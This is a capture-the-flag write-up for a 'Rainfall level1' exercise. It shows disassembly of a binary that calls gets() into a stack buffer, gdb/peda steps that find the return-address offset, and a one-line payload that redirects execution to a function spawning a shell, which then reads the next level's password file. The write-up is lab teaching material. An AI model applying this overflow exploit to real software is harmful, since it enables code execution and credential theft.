#
#	Rainfall level1
#

	1. Methodology:

After disassembling the binary, we see that the array is not protected.
We are going to look for the limit of this array. For that we use a partern created by peda
We will inject the address of the run function on the byte that segfault.
For this we create a string: (char * result pattern offset) + function address in little endian.

	2. Command:

$ objdump -d level1
	08048444 <run>:
 	8048444:	55                   	push   %ebp
 	8048445:	89 e5                	mov    %esp,%ebp
 	8048447:	83 ec 18             	sub    $0x18,%esp
 	804844a:	a1 c0 97 04 08       	mov    0x80497c0,%eax
 	804844f:	89 c2                	mov    %eax,%edx
 	8048451:	b8 70 85 04 08       	mov    $0x8048570,%eax
 	8048456:	89 54 24 0c          	mov    %edx,0xc(%esp)
 	804845a:	c7 44 24 08 13 00 00 	movl   $0x13,0x8(%esp)
 	8048461:	00
 	8048462:	c7 44 24 04 01 00 00 	movl   $0x1,0x4(%esp)
 	8048469:	00
 	804846a:	89 04 24             	mov    %eax,(%esp)
 	804846d:	e8 de fe ff ff       	call   8048350 <fwrite@plt>
 	8048472:	c7 04 24 84 85 04 08 	movl   $0x8048584,(%esp)
 	8048479:	e8 e2 fe ff ff       	call   8048360 <system@plt>
 	804847e:	c9                   	leave
 	804847f:	c3                   	ret

	08048480 <main>:
 	8048480:	55                   	push   %ebp
 	8048481:	89 e5                	mov    %esp,%ebp
 	8048483:	83 e4 f0             	and    $0xfffffff0,%esp
 	8048486:	83 ec 50             	sub    $0x50,%esp
 	8048489:	8d 44 24 10          	lea    0x10(%esp),%eax
 	804848d:	89 04 24             	mov    %eax,(%esp)
 	8048490:	e8 ab fe ff ff       	call   8048340 <gets@plt>
 	8048495:	c9                   	leave
 	8048496:	c3                   	ret

$ gdb ./level1

$ source /tmp/peda/peda.py

$ pattern create 200
	'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

$ pattern offset {valeur EIP}
	1093943617 found at offset: 76

$ x/s run
	0x8048444 <run>:	 "U\211\345\203\354\030\241\300\227\004\b\211¸p\205\004\b\211T$\f\307D$\b\023"

$ python -c 'print chr(0)*76 + "\x44\x84\x04\x08"' > /var/crash/attack

$ cat /var/crash/attack - | ./level1

$ whoami
	level2

$ cat /home/user/level2/.pass
	53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77
